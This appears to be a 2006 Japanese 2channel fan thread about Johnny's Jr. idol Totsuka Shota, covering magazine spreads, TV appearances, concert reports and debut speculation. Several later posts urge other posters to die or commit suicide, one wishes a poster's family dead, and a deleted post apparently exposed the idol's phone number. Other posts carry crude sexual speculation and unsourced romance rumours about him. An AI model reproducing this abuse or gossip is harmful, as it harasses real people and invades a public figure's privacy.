黒髪最高!!

454 :ユーは名無しネ:2006/12/08(金) 23:42:25
髪型で良く見せようってのじゃなく
飾らない自然体でキャワな凸は最高

455 :ユーは名無しネ:2006/12/09(土) 00:27:05
年下のとりんにも真顔でバリかわいいって言われる凸キャワ

456 :ユーは名無しネ:2006/12/09(土) 00:27:53
夏頃までは太ってたけど最近顔が痩せたかな?
痩せたり太ったりすると危ないよビズ的に
凸って忙しい方が太る体質なのかも

457 :ユーは名無しネ:2006/12/09(土) 00:44:29
D誌の凸が女にしか見えない

458 :ユーは名無しネ:2006/12/09(土) 00:59:53
X'mastreeのやつ?

459 :ユーは名無しネ:2006/12/09(土) 01:20:52
とりん雑誌で凸の事可愛いって言ってたの?
ワイハ?

460 :ユーは名無しネ:2006/12/09(土) 01:41:19
>459

つ片目誌84ペ-ジ

461 :ユーは名無しネ:2006/12/09(土) 01:49:05
>460
d
友達から切り抜きもらったらすぐに見てみるよ
楽しみ

462 :ユーは名無しネ:2006/12/09(土) 12:45:03
w氏でゐ蝉と足面が一緒に箱根とかいろいろ行ったとか言ってるけど
凸は海老氏面とは遊ばないんだね
凸はヒラメと仲良しみたいでよかったけどズニアとはあまり遊ばないで
ズニアは仕事のみの付き合いなのか脳

463 :ユーは名無しネ:2006/12/09(土) 12:53:35
何を今更・・・

464 :ユーは名無しネ:2006/12/09(土) 13:41:08
やっぱ今更か
凸は昔ゐにはぶられてたしね
今でも仲良くないよね

465 :ユーは名無しネ:2006/12/09(土) 16:17:35
他を蹴落としてもBigになってよね凸
信じられるのは自分だけだからね

466 :ユーは名無しネ:2006/12/09(土) 17:28:09
やっと雑誌買ってきた
とりんにもあだ名で呼ばれてるんだな
凸もカバエエしそれを言うとりんもカバエエ

467 :ユーは名無しネ:2006/12/09(土) 18:53:28
波のカツントピに昨日のタモステリハの海老氏の様子書いてあるよ

468 :ユーは名無しネ:2006/12/09(土) 22:43:52
>456
今月の片目誌で凸自身が体重は53`とかと曖昧な言い方してた
多分凸はあまり体重とか筋トレとか気にしてないんだろう

469 :ユーは名無しネ:2006/12/09(土) 23:37:51
170で53キロなら普通だよね


470 :凸おめ:2006/12/10(日) 00:13:09
802:ユーは名無しネ :2006/12/09(土) 22:20:53
マハ極秘情報ハマ

J-White
とっつ→
がや
しょぉん
やぶ
ぃのぉ
せんが

J-Black
きたゃま
なかま
かわぃ
たかき
ひかる
にか

471 :ユーは名無しネ:2006/12/10(日) 00:14:07
何がお目なのか全く意味が分からんのだが

472 :ユーは名無しネ:2006/12/10(日) 10:55:35
>468
たぶんそう
数年前、痩せた?って聞いたらわかんないって言われたよ

473 :ユーは名無しネ:2006/12/10(日) 13:41:36
カワエエとりんに何回もバリカワイイって言われる凸スゴス(w


474 :ユーは名無しネ:2006/12/10(日) 15:24:12
凸もいたの?
いないところで言われたの?

475 :ユーは名無しネ:2006/12/10(日) 16:52:34
海老氏明日一曲も歌わないんだな

476 :ユーは名無しネ:2006/12/10(日) 17:54:17
今日はうわさマンあるかなぁ

477 :ユーは名無しネ:2006/12/10(日) 19:00:23
先週はまだ出てた感じがあったけど今週のはシンクリとかOPとか連想ゲームしかでてなくて
つまらなかったよ
鑢メインなのは分かるけど足もまだトーク呼ばれてて辛いな

478 :ユーは名無しネ:2006/12/10(日) 19:46:20
明日一曲も歌わないってホントに?
先月も少なかったのにまたコレか…

479 :ユーは名無しネ:2006/12/10(日) 20:21:04
新曲とヘドバンギングってタイトル曲あるけど新曲は滝つ、ヘドバンギングはQ新曲の気ガス
本当に海老氏曲が1曲もないんだが(OPのメドレー以外
先月はハワイに行ってたから出番少なくてもしょうがないとして明日は何で海老氏曲ないんだろう

480 :ユーは名無しネ:2006/12/10(日) 21:03:07
海老氏は雑誌の扱いも悪いしもうだめかもと
ネガティブに考えてしまう

481 :ユーは名無しネ:2006/12/10(日) 21:16:00
雑誌は七人だと三頁になるんだね
海老氏は人数が少ないよ

482 :ユーは名無しネ:2006/12/10(日) 21:26:46
鑢はそのまんまデブ出来るとして足はそのまんまデブは120%無理
必ず来年のWCはいろんなユニからピックアップしてユニ作るはず
それは子猫に+αかも知れないけど

483 :ユーは名無しネ:2006/12/10(日) 22:31:15
今日の少倉と明日の曲目みて>480姐さんと同じ気持ちになってしまった
けど出番が少なく感じるのって前は先輩のバックとしての出番が多かったからだよな
でもやっぱ扱い悪いよな○| ̄|_

484 :ユーは名無しネ:2006/12/10(日) 22:35:40
>483
そのAAが逆できもりわりいいいいい
先週は黒シャツがあったから充実してたんだよね
扱い悪いのは足より1曲ユニ曲が少ない事(ソロは海老氏梨
まぁ来年に笑うのは海老氏足の誰かだからさー気楽にwww

485 :ユーは名無しネ:2006/12/10(日) 23:04:24
今の心の支えは子猫しかない

486 :ユーは名無しネ:2006/12/10(日) 23:15:56
>485
自分もそうだがそう思うとと海老氏が可哀相だ

487 :ユーは名無しネ:2006/12/10(日) 23:23:03
みんな複雑だな

488 :ユーは名無しネ:2006/12/10(日) 23:25:42
緑に言われたくもないけど今回ばかりはしょうがない
自分も緑になっていう

海老氏って扱いいいのか悪いのか分からん
ハワイだって行かされるしカツンのバックも専属っぽいし
扱いいいんだろうか

489 :ユーは名無しネ:2006/12/10(日) 23:31:26
海老氏はMAみたいになるからデビューはないよ。

490 :ユーは名無しネ:2006/12/10(日) 23:35:15
今日の出番もないのに明日海老氏大丈夫かなあ

491 :ユーは名無しネ:2006/12/10(日) 23:37:03
子猫も苺がデブしたら終わる気がするけどね

492 :ユーは名無しネ:2006/12/10(日) 23:48:44
>491
足があの面子全員デブ出来ないからね(顔無細工+才能梨)
海老氏と足と急行の中からデブするのは確か
来年の6月頃にならないとデブする面子分からないよ
ちなみに石鹸面がバレタのは6月30日あたり3年前ね
にくちゃんねるで探してみて
デブスレにP引きいるユニがWCデブって書いてあるから
バレボ協会から漏れた

493 :ユーは名無しネ:2006/12/11(月) 01:39:40
扱い悪いのは先月だけ
その前は凸ソロも2曲あったし出番も多かった
明日本当に海老氏曲ないなら考えものだけど
しかし海老氏曲書いてないのはどうしてなんだろ謎

494 :ユーは名無しネ:2006/12/11(月) 12:56:02
デブじゃないから出番減らされてきただけ、年齢も年齢だから。今まで二十歳過ぎて少倉に出てるJr.自体いない
皆下のJr.が育つために必要なくなってくる
厳しいけどそれが現実。

495 :ユーは名無しネ:2006/12/11(月) 12:59:11
現実を受け止めなきゃね
苺がデブしたら今までの プッシュはなくなるよ

496 :ユーは名無しネ:2006/12/11(月) 13:04:44
494様ゴミ付けたり外したり自演に必死ですわね
北山君を始め今は20代のJr.だらけでございます
しかも人気があるのは20代Jr.
でもCDを出してもNEWSを見てるとデビューが必ずしも幸せかとは限らないと分かりました
増田くんはいいともで知名度0でしたね
あれほどドラマに出てたのに
それを考えるとJr.のままが幸せですわ
レギュラー番組もありますしね

497 :ユーは名無しネ:2006/12/11(月) 13:06:58
>496=495

お前は誰担だ?
足は大足はブタム21歳、ゑ20歳、父さんも来年20歳だぞ
それも知らないお前は誰担だか教えてくれ
足担じゃないことは分かった

498 :ユーは名無しネ:2006/12/11(月) 13:07:47
間違えた

>494=495

499 :ユーは名無しネ:2006/12/11(月) 13:07:56
今は例外だろ。新規みたいな考えしてんなよ。キモイな 二十歳のJr.がいる事が前例ではあまりない。
二十歳になればやっぱそれなりに減らされていく
新規ちゃんと考えてね

500 :ユーは名無しネ:2006/12/11(月) 13:09:28
20代Jr.が人気だってお前にわかるわけない。
20代Jr.が誰か分かってるわけ?笑 消えな
今は特急とかのが人気

501 :ユーは名無しネ:2006/12/11(月) 13:25:13
特急って誰

壷ネームで書け
ヒキー

502 :ユーは名無しネ:2006/12/11(月) 13:28:17
>499-500はsageも2ネームも知らないツボ初心者
半年ロムってから死ね

503 :ユーは名無しネ:2006/12/11(月) 13:28:57
502テメーが死ね死ね死ね死ね

504 :ユーは名無しネ:2006/12/11(月) 13:29:08
>>500
特急ってツボで何ていうかな?答えてみ

505 :ユーは名無しネ:2006/12/11(月) 13:29:55
>503
オマイ少蔵スレでも死ねって言われてただろ
にくちゃんねるの探し方も分からん深山だな
とにかく死ね

506 :ユーは名無しネ:2006/12/11(月) 13:30:01
お前らどうせ地方の田舎住みだろ笑 新規田舎地方の集まりだろ笑

507 :ユーは名無しネ:2006/12/11(月) 13:30:34
>503は携帯からの書き込み

508 :ユーは名無しネ:2006/12/11(月) 13:30:47
言われてねーよ。テメー地方か?新規死ねや

509 :ユーは名無しネ:2006/12/11(月) 13:31:05
>506



↑これ何

510 :ユーは名無しネ:2006/12/11(月) 13:31:51
新規だって
久々聞いた
新規って言葉
ココでは深山だからね


511 :ユーは名無しネ:2006/12/11(月) 13:32:24
っーかお前ら自分でキモイとか思わねーの?
何語だよ。死ねや。
ヲタク丸出し。キモすぎ。
何がキャワでもいいだよ
スレタイからしてキモイ

512 :ユーは名無しネ:2006/12/11(月) 13:32:25
笑とか新規とか特急とかツボでは見ない言葉がイパーイ\(^o^)/

513 :ユーは名無しネ:2006/12/11(月) 13:32:32
確かに田舎には娯楽施設がないだろうから、ネットの利用者
は多いはず。あくどいやつが多いのもそのせいだろう。
田舎者はいばっているからな。

514 :ユーは名無しネ:2006/12/11(月) 13:32:59
>511
半角は覚えたの?
次は緑を治しなさい

515 :ユーは名無しネ:2006/12/11(月) 13:33:29
>513
はいはい
ゴミつき

516 :ユーは名無しネ:2006/12/11(月) 13:33:51
お前ら戸塚応援する資格ないよ。地方の新規ども
キモイんだよ。
ヲタク丸出しすぎて引く

517 :ユーは名無しネ:2006/12/11(月) 13:34:06
>513
あなたの文章には間違えが二つあります
さてなんでしょうか

518 :ユーは名無しネ:2006/12/11(月) 13:34:37
>516
戸塚って何

519 :ユーは名無しネ:2006/12/11(月) 13:35:09
キモイキモイ何だこのスレ自体
キチガイの集まりだな
秋葉ヲタク以上にキモイ秋葉ヲタク以上だなお前ら

520 :ユーは名無しネ:2006/12/11(月) 13:36:10
戸塚も分からないのか
ここはそういう言葉でなきゃ会話できねーのか?
キモイ お前らまじキモイ

521 :ユーは名無しネ:2006/12/11(月) 13:37:19
戸塚祥太と普通にレスできないんだな。秋葉ヲタク以上どもが

522 :ユーは名無しネ:2006/12/11(月) 13:38:29
ここに溶けこんでるやつ自体引く引く引くキモイキモ過ぎ

523 :ユーは名無しネ:2006/12/11(月) 14:39:56
じゃあ来なきゃイイのに(´・ω・')ネー

524 :ユーは名無しネ:2006/12/11(月) 14:51:14
壼にいるのは場違いだから
その辺のファソサイトにでも逝け

525 :ユーは名無しネ:2006/12/11(月) 15:41:37
ちょっとこない間になんだよ
この雰囲気

526 :ユーは名無しネ:2006/12/11(月) 15:58:38
テメーラ何語だよ。おまえらみたいな言葉しか話せないやつしか受けつけないとか
そんなキモイヲタクの中になんか入りたくもないね。
まじキモイ秋葉ヲタク以下。

527 :ユーは名無しネ:2006/12/11(月) 16:18:04
>526
だったら来なきゃいいだろボケ

528 :ユーは名無しネ:2006/12/11(月) 16:35:56
>>526
だからロムれって

529 :ユーは名無しネ:2006/12/11(月) 17:37:29
sage
sage

sage

sage

sage


sage

sage

530 :ユーは名無しネ:2006/12/11(月) 19:29:17
少蔵で海老氏新曲キタ━━━━━━(゚∀゚)━━━━━━!!!


滝つバックには無所一部急行チビしかついてないモヨン
だから滝つ紺には出ないかもね
武道館紺も迫ってるしね

531 :ユーは名無しネ:2006/12/11(月) 19:38:37
>>530
wktk

532 :ユーは名無しネ:2006/12/11(月) 20:01:43
滝つ無所急行チビってボミョン

533 :ユーは名無しネ:2006/12/11(月) 20:41:03
滝つだけでも埋まるって分かったんだろう

534 :ユーは名無しネ:2006/12/11(月) 20:45:36
いちいち反応すんなよボケ

535 :ユーは名無しネ:2006/12/11(月) 20:58:37
海老氏新曲?

536 :ユーは名無しネ:2006/12/11(月) 21:08:16
>535
sageろ
メール欄に半角でsageって次からいれないと死ねってかく

537 :ユーは名無しネ:2006/12/11(月) 21:13:33
どんだけ口悪いの。女かよ

538 :ユーは名無しネ:2006/12/11(月) 21:14:22
昨日の馬鹿死ね

海老氏新曲ないとか書いて明日自殺でもするか?

539 :ユーは名無しネ:2006/12/11(月) 21:18:05
537死ね

540 :ユーは名無しネ:2006/12/11(月) 21:18:14
お前が自殺してこいよ

541 :ユーは名無しネ:2006/12/11(月) 21:26:53
540が自殺しろ
もうクルナ

542 :ユーは名無しネ:2006/12/12(火) 00:14:42
うざ

543 :あぼーん:あぼーん
あぼーん

544 :ユーは名無しネ:2006/12/12(火) 03:00:05
543
それ戸塚くんの番号ですよ?こんなとこに書かないであげてください!
迷惑です!!

545 :ユーは名無しネ:2006/12/12(火) 03:43:37
2ちゃんで番号晒しはやばいよ
IP記録されてるから通報していい?

546 :ユーは名無しネ:2006/12/12(火) 07:53:12
オゲ
>537-544の人通報

547 :ユーは名無しネ:2006/12/12(火) 10:22:22
誰も少蔵レポ書かないし
凸ズニア辞めちゃうのかな
なんか昨日の夜から欝になってきたよ

548 :ユーは名無しネ:2006/12/12(火) 10:37:25
レポしたいがこの空気じゃ無理だろ

549 :ユーは名無しネ:2006/12/12(火) 10:49:14
誰かが空気変えないと一生このままだよ
レポればいいよ

550 :ユーは名無しネ:2006/12/12(火) 11:09:31
海老氏スレにも緑いたし徹底的にスルーで


551 :ユーは名無しネ:2006/12/12(火) 11:17:01
凸ってホント不器用なんだね
表向きはそうじゃないけど

552 :ユーは名無しネ:2006/12/12(火) 13:53:29
そこがまたかわいいよね

553 :ユーは名無しネ:2006/12/12(火) 14:32:00
レポ落とさないの?

554 :ユーは名無しネ:2006/12/12(火) 15:24:13
滝つ新曲のダメがキャワだった
手で×を作ったりするんだが何かに変身しそうな勢いダタ(w
スタンバイ中に隣でマヨが振り確認をしたらすかさず教えてあげる凸モエス
いざ曲が始まったら振りがあやふやでカンニングしてる凸モエス
少蔵マニアではメダル2つ首にかけてて得意げ
クイズ始まるまではステージのど真ん中に立ってたからOAでの映り込みに期待
海老氏曲はカコイイ路線でダンスもアクロも激しかった
そのせいかマイク持たないでインカムつけてた
海老氏曲終わってハケる時にジャケットをはだけながらハケててゐが乗り移ったのかとオモタ(w

新曲とゐのモノマネのせいで記憶が曖昧でスマソ
補足できる姐さんいましたらヨロです

555 :ユーは名無しネ:2006/12/12(火) 15:48:30
>554姐さんレポd!
放送楽しみ

556 :ユーは名無しネ:2006/12/12(火) 15:50:16
>554
kwskレポdです
マヨに教えてあげてたのかモエス
滝つ新曲ってシングルになるのか脳
早く見たい脳
いつも通り元気良さそうで何よりですた

557 :ユーは名無しネ:2006/12/12(火) 16:47:02
マヨになりたい(・◇・)

558 :ユーは名無しネ:2006/12/12(火) 22:48:18
>554
レポdです!
教えてあげたにも関わらずカンニングなんてモエス
放送楽しみですね

559 :ユーは名無しネ:2006/12/13(水) 02:13:15
なんでまよ?

560 :ユーは名無しネ:2006/12/13(水) 09:51:37
本当にこの同一荒らし気持ち悪い
一日中ユニスレとここ張り付いてる
しかもsage使ったり、全角使ったり、壷ネームも実は全て理解してる確信犯
電話番号載せる位だから冷静な奴ではないと分かった
まじで引きこもりのキチガイなんだろうな
嫌いなら来なきゃいいのにこのしつこさが異常だよ
精神病かよ…
通報したら削除すぐにしてくれたからアク禁にするか…

561 :560:2006/12/13(水) 10:09:01
しかもリア厨とみせかけてファソのなりしてるレスもある
読めばすぐに分かるけどね

562 :ユーは名無しネ:2006/12/13(水) 15:33:44
こんな基地外久しぶりに見た・・・
本当コイシ頭逝ってんジャマイカ

563 :ユーは名無しネ:2006/12/13(水) 18:02:28
凸あげ

564 :ユーは名無しネ:2006/12/14(木) 02:46:04
>554
レポ豚です!
放送は1月かな?カンニング凸wktk


姐さん方低脳キチガイなんてほっといてマターリしようよ(´・ω・')
ソイシ頭悪いから反応すると喜んじゃうよ

565 :ユーは名無しネ:2006/12/14(木) 02:52:11
564鏝安置
ファソの振りしてレスの内容が酷すぎる
良くこんな内容が書けるな
人として終わってる

566 :↓全て同一:2006/12/14(木) 02:56:57
552 :ユーは名無しネ:2006/12/12(火) 13:53:29
そこがまたかわいいよね
559 :ユーは名無しネ:2006/12/13(水) 02:13:15
なんでまよ?
563 :ユーは名無しネ:2006/12/13(水) 18:02:28
凸あげ
564 :ユーは名無しネ:2006/12/14(木) 02:46:04
>554
レポ豚です!
放送は1月かな?カンニング凸wktk
姐さん方低脳キチガイなんてほっといてマターリしようよ(´・ω・')
ソイシ頭悪いから反応すると喜んじゃうよ

567 :↓全て同一:2006/12/14(木) 02:59:49
552 :ユーは名無しネ:2006/12/12(火) 13:53:29
そこがまたかわいいよね
559 :ユーは名無しネ:2006/12/13(水) 02:13:15
なんでまよ?
562 名前:ユーは名無しネ :2006/12/13(水) 15:33:44
こんな基地外久しぶりに見た・・・
本当コイシ頭逝ってんジャマイカ
563 :ユーは名無しネ:2006/12/13(水) 18:02:28
凸あげ
564 :ユーは名無しネ:2006/12/14(木) 02:46:04
>554
レポ豚です!
放送は1月かな?カンニング凸wktk
姐さん方低脳キチガイなんてほっといてマターリしようよ(´・ω・')
ソイシ頭悪いから反応すると喜んじゃうよ


↑下2行目で襤褸出してるアフォだなこの安置

568 :ユーは名無しネ:2006/12/14(木) 03:00:45
何処のスレも荒れ放題

569 :ユーは名無しネ:2006/12/14(木) 03:01:19
ファソの振りして書き込みしてるのが不気味
何が目的なんだ
ユニスレでも安置レスしてるし

570 :ユーは名無しネ:2006/12/14(木) 09:40:20
ファソって何?

571 :ユーは名無しネ:2006/12/14(木) 11:06:19
顔だけもっとピザって
目が窪んでお疲れな顔だよ
TVでは○いけど雑誌はなぜかゲキヤセしてる
変な髪形にするのもやめてくれ

572 :ユーは名無しネ:2006/12/14(木) 12:10:34
でもジャニヲタってピザ大嫌いじゃん
太ったらどうせ叩かれるよ

573 :ユーは名無しネ:2006/12/14(木) 16:01:07
担ナリ安置ウザ

574 :ユーは名無しネ:2006/12/14(木) 16:07:30
572=573

575 :ユーは名無しネ:2006/12/14(木) 22:47:52
前のお顔ふっくらキャワだったよね
自分は最近の少しこけ気味の頬や目元が男っぽくて好みだが

576 :ユーは名無しネ:2006/12/14(木) 23:10:09
今月号に限って目が二重から三重になってるみたいだから目元が老けてるんだよね

577 :ユーは名無しネ:2006/12/15(金) 00:19:34
ハワイにて
みんなですっぽんぽんでお風呂に入るのに
恥ずかしがる凸

578 :ユーは名無しネ:2006/12/15(金) 00:30:48
>577
何それ?

579 :ユーは名無しネ:2006/12/15(金) 00:35:57
お風呂話は何誌に載ってた?
とりんがバリキャワは読んだけど

580 :ユーは名無しネ:2006/12/15(金) 00:39:18
ん?
片目誌の栗ページだよ

581 :ユーは名無しネ:2006/12/15(金) 00:43:56
>580
d!見逃してた
恥ずかしがるなよ凸(w

582 :ユーは名無しネ:2006/12/15(金) 00:52:38
山田の方ね
d

583 :ユーは名無しネ:2006/12/15(金) 02:04:24
お風呂話とは関係茄なんだが凸何かあったんじゃまいか?

584 :ユーは名無しネ:2006/12/15(金) 14:30:40
俺様日記によると毛逝が百式に出たらしい
だからそのうち凸も出るかも新米

585 :ユーは名無しネ:2006/12/15(金) 15:36:07
>584
なぜそう思うの?


586 :ユーは名無しネ:2006/12/15(金) 15:36:53
ゴメ ↑>583 だ

587 :ユーは名無しネ:2006/12/15(金) 17:12:11
海老氏滝つ紺ヤパーリでないんだね

588 :ユーは名無しネ:2006/12/15(金) 18:41:08
痩せたのは恋しているからジャマイカ
「恋は爆弾 ご飯も食べられなくなる」

589 :ユーは名無しネ:2006/12/15(金) 18:51:54
>583=585=586=588


お前早く死ね

590 :ユーは名無しネ:2006/12/15(金) 19:08:44
安置ウザイな
今日中に家族全員で死んでくれないかな
一応仏壇に祈ってみるよ
毎日来る凸安置一家全員死にますようにって

591 :ユーは名無しネ:2006/12/15(金) 19:12:28
お約束
・ファンサ話はモメサの元なので禁止
・雑誌に載った話以外(噂・マガネタ)は禁止
・妄想話は禁止
・安置が自演してもスルー
・個人スレなのでsageでマターリ

592 :ユーは名無しネ:2006/12/15(金) 19:13:02


593 :ユーは名無しネ:2006/12/15(金) 19:14:07


594 :ユーは名無しネ:2006/12/15(金) 19:14:19


595 :ユーは名無しネ:2006/12/15(金) 19:14:51


596 :ユーは名無しネ:2006/12/15(金) 19:15:01


597 :ユーは名無しネ:2006/12/15(金) 19:15:47


598 :ユーは名無しネ:2006/12/15(金) 19:16:28


599 :ユーは名無しネ:2006/12/15(金) 19:17:12


600 :ユーは名無しネ:2006/12/15(金) 19:17:33


601 :ユーは名無しネ:2006/12/15(金) 19:18:02


602 :ユーは名無しネ:2006/12/15(金) 19:18:24


603 :ユーは名無しネ:2006/12/15(金) 19:18:50


604 :ユーは名無しネ:2006/12/15(金) 19:19:13


605 :ユーは名無しネ:2006/12/15(金) 19:19:49


606 :ユーは名無しネ:2006/12/15(金) 19:20:04


607 :ユーは名無しネ:2006/12/15(金) 19:20:53


608 :ユーは名無しネ:2006/12/15(金) 19:21:22


609 :ユーは名無しネ:2006/12/15(金) 19:21:49


610 :ユーは名無しネ:2006/12/15(金) 19:22:14


611 :ユーは名無しネ:2006/12/15(金) 19:22:32


612 :ユーは名無しネ:2006/12/15(金) 19:23:01


613 :ユーは名無しネ:2006/12/15(金) 19:23:18


614 :ユーは名無しネ:2006/12/15(金) 19:23:49


615 :ユーは名無しネ:2006/12/15(金) 19:24:25


616 :ユーは名無しネ:2006/12/15(金) 19:24:31


617 :ユーは名無しネ:2006/12/15(金) 19:25:13


618 :ユーは名無しネ:2006/12/15(金) 19:26:07


619 :ユーは名無しネ:2006/12/15(金) 19:26:35


620 :ユーは名無しネ:2006/12/15(金) 19:27:05


621 :ユーは名無しネ:2006/12/15(金) 19:27:27


622 :ユーは名無しネ:2006/12/15(金) 19:27:55


623 :ユーは名無しネ:2006/12/15(金) 19:28:24


624 :ユーは名無しネ:2006/12/15(金) 19:29:00


625 :ユーは名無しネ:2006/12/15(金) 19:29:06


626 :ユーは名無しネ:2006/12/15(金) 19:29:53


627 :ユーは名無しネ:2006/12/15(金) 19:30:09


628 :ユーは名無しネ:2006/12/15(金) 19:30:42


629 :ユーは名無しネ:2006/12/15(金) 19:31:16


630 :ユーは名無しネ:2006/12/15(金) 19:31:31


631 :ユーは名無しネ:2006/12/15(金) 19:31:58


632 :ユーは名無しネ:2006/12/15(金) 19:32:35


633 :ユーは名無しネ:2006/12/15(金) 19:33:04


634 :ユーは名無しネ:2006/12/15(金) 19:33:37


635 :ユーは名無しネ:2006/12/15(金) 19:33:54


636 :ユーは名無しネ:2006/12/15(金) 19:34:34


637 :ユーは名無しネ:2006/12/15(金) 19:35:03


638 :ユーは名無しネ:2006/12/15(金) 19:35:29


639 :ユーは名無しネ:2006/12/15(金) 19:36:06


640 :ユーは名無しネ:2006/12/15(金) 19:36:38


641 :ユーは名無しネ:2006/12/15(金) 19:37:04


642 :ユーは名無しネ:2006/12/15(金) 19:37:28


643 :ユーは名無しネ:2006/12/15(金) 19:37:55


644 :ユーは名無しネ:2006/12/15(金) 19:38:16


645 :ユーは名無しネ:2006/12/15(金) 19:38:44


646 :ユーは名無しネ:2006/12/15(金) 19:39:03


647 :ユーは名無しネ:2006/12/15(金) 19:40:32
叶うもの

648 :ユーは名無しネ:2006/12/15(金) 20:11:25
なんだこいつ?

649 :ユーは名無しネ:2006/12/15(金) 20:12:57
凸だけつづきならソロデブキタワァ*・゚゚・*:.。..。.:*・゚(n`∀`)η゚・*:.。. .。.:*・゚゚・* !!!!!

650 :ユーは名無しネ:2006/12/15(金) 20:22:34
マジでつか?

651 :ユーは名無しネ:2006/12/15(金) 20:24:50
「でつ」はズニア板は使用禁止

652 :ユーは名無しネ:2006/12/16(土) 01:52:20
男子が風呂場で恥ずかしがる理由

1 自分のブツに自信がなくて恥ずかしい(極端に小さい or 大きい or 包○)
2 他人のブツが気になって恥ずかしい(もしかしてゲ○)

653 :ユーは名無しネ:2006/12/16(土) 09:13:36
↑自殺しろ
死ね

654 :ユーは名無しネ:2006/12/16(土) 10:17:05
非難所行こうか
毎日きてるしこのキチガイ

655 :ユーは名無しネ:2006/12/16(土) 10:23:31
te

656 :ユーは名無しネ:2006/12/16(土) 10:40:44
10レス以上自演してるよね
この安置
sageできたり上げたりナリしたり
特長があるレスするからわかる

657 :ユーは名無しネ:2006/12/16(土) 10:43:27
お約束
・ファンサ話はモメサの元なので禁止
・雑誌に載った話以外(噂・マガネタ)は禁止
・妄想・憶測話はしない         
・安置が自演してもスルー
・個人スレなのでsageでマターリ
・タレ本人や他タレを貶さない



※これらを守れないのは安置

658 :ユーは名無しネ:2006/12/16(土) 19:12:57
裸少の予告だけで楽しみ倍増してる自分は


バカか?

明日いたら張り切ってレポしようと思ってたのに
つきそうもないのか

659 :ユーは名無しネ:2006/12/16(土) 19:46:29
去年のカツンコンの悪夢が…

660 :ユーは名無しネ:2006/12/16(土) 20:00:42
>659
悪夢?

前半戦のことか?

661 :ユーは名無しネ:2006/12/16(土) 21:23:36
ソロデブなわけないだろ

662 :ユーは名無しネ:2006/12/16(土) 23:27:12
また自演

663 :ユーは名無しネ:2006/12/17(日) 09:21:26
>>580
ごめんなさい、どの雑誌か教えていただけませんか?

664 :ユーは名無しネ:2006/12/17(日) 11:21:31
663ハイパー自演安置しねぇ

665 :ユーは名無しネ:2006/12/17(日) 14:48:34
波の運動会写真キタ
どれもビズよくて満足

666 :ユーは名無しネ:2006/12/19(火) 10:50:30
運動会良い写真だったよね
遅かった分喜び倍増


667 :ユーは名無しネ:2006/12/19(火) 13:37:59
凸の彼女は地元の年上美人だよ

668 :ユーは名無しネ:2006/12/19(火) 14:03:11
家を空けててやっと運動会写真受け取ったよ
見本がない状態で注文したから心配だったがビズ良くて安心した
葡萄缶写真も出るといいな

669 :ユーは名無しネ:2006/12/19(火) 14:06:57
少しは仲良くしたら

670 :ユーは名無しネ:2006/12/19(火) 15:16:52
子猫で申し込めば良かったかも
海老氏人気あるし
失敗した

671 :ユーは名無しネ:2006/12/19(火) 15:35:05
>670
自分もーーーーーーー


672 :ユーは名無しネ:2006/12/19(火) 15:35:38
あれ?


673 :ユーは名無しネ:2006/12/19(火) 15:36:25
横蟻つくかもだよね

674 :ユーは名無しネ:2006/12/19(火) 15:36:58
今日も武道館リハかな

675 :ユーは名無しネ:2006/12/19(火) 15:37:33
昨日は風邪引いてこここれなくてごめんねー>ALL

676 :ユーは名無しネ:2006/12/19(火) 15:38:06
滝つばこん見た友達から1人もメールこないよ!

677 :ユーは名無しネ:2006/12/19(火) 15:38:40
ABCついてないからショックだったのかな???

678 :ユーは名無しネ:2006/12/19(火) 15:40:17
そういえば誰も滝つばこんの感想書いてないけどどうしたの?

679 :ユーは名無しネ:2006/12/19(火) 15:42:21
デビューが近づくとテレビで見れなくなって悲しいよね
凸ドラマ決まればいいけどね
ちと遅咲きだったよね

680 :ユーは名無しネ:2006/12/19(火) 16:45:46
>671-679
お前は何ものなんだ?
なんか勘違いしてないか?
それとも頭おかしいの?
こられなくてごめんねーって誰も待ってねーし

681 :ユーは名無しネ:2006/12/20(水) 11:11:51
近代載ってるかよ
曲情報とかないかよ

682 :ユーは名無しネ:2006/12/20(水) 15:31:07
近代載ってたよ
海老氏4人で1Pで見開きになってて2人ずつ1P
あと夕立レポと子猫の※もあった

683 :ユーは名無しネ:2006/12/20(水) 16:41:36
>682
マジ?
海老氏で3Pも?
目汁でそう

684 :ユーは名無しネ:2006/12/20(水) 19:23:44
近代2人のページはかなりアップだったよ
珍しいよね

685 :ユーは名無しネ:2006/12/20(水) 19:58:43
明日さっそく買ってこよ

686 :ユーは名無しネ:2006/12/20(水) 20:06:37
楽しみだな
足や急行も載ってるの?

687 :ユーは名無しネ:2006/12/20(水) 20:33:00
近代くあしくd

688 :ユーは名無しネ:2006/12/20(水) 23:09:26
>687
ゐと凸がバリバリ$目線ダタ
特にゐの目力と唇には凸担でもドチドチしたよ
凸はキャワふわ系?

689 :ユーは名無しネ:2006/12/21(木) 00:52:08
>688
j目線wktk
ネットで注文したから来るの楽しみだ

690 :ユーは名無しネ:2006/12/21(木) 08:45:09
1月の放送でうわさマン復活するね
今から嬉しい

691 :ユーは名無しネ:2006/12/21(木) 12:45:38
ほんとだ
スゲ楽しみだ

692 :ユーは名無しネ:2006/12/21(木) 13:37:26
どこに書いてあった?
HPにはなかった

693 :ユーは名無しネ:2006/12/21(木) 13:41:02
HPに書いてあるけど?

694 :ユーは名無しネ:2006/12/21(木) 15:51:05
www.nhk.or.jp/bs/shonen


↑これだよね?
書いてないんだけど
海老氏の曲でさえ書いてない
ゐが何かやるとは書いてたけど

695 :ユーは名無しネ:2006/12/21(木) 16:24:11
>694
書いてあるぞ
さりげなく書いてるから見落としやすいかも

696 :ユーは名無しネ:2006/12/21(木) 17:59:57
>694
謎の下から3行目から書いてあるよ

697 :ユーは名無しネ:2006/12/21(木) 19:34:02
>695-696
d
そこだけ見逃してた
誰が出るのか気になるね噂マン

698 :ユーは名無しネ:2006/12/23(土) 00:51:00
タモステ、いっぱい映っててウマーだたね(*´Д`)

699 :ユーは名無しネ:2006/12/23(土) 00:59:28
いつになく映ってたね(w
美茄子の階段降り変なカッコでワロタ

700 :ユーは名無しネ:2006/12/23(土) 01:08:12
凸の事目で追うの疲れるよね

701 :ユーは名無しネ:2006/12/23(土) 01:37:50
テロップもでてよかったね
明日は裸だし少蔵栗スペサルだし日曜日も夕立だし
週末は忙しいね

702 :ユーは名無しネ:2006/12/23(土) 16:09:29
戸塚

703 :ユーは名無しネ:2006/12/23(土) 18:05:09
ジヌンの地方は裸半年遅れで放送…
どなたか今日の裸レポよろしくです

704 :ユーは名無しネ:2006/12/23(土) 19:14:16
ジヌン厨凸担だったのか
半年も遅れてる地域ってdkdk

705 :ユーは名無しネ:2006/12/23(土) 21:18:06
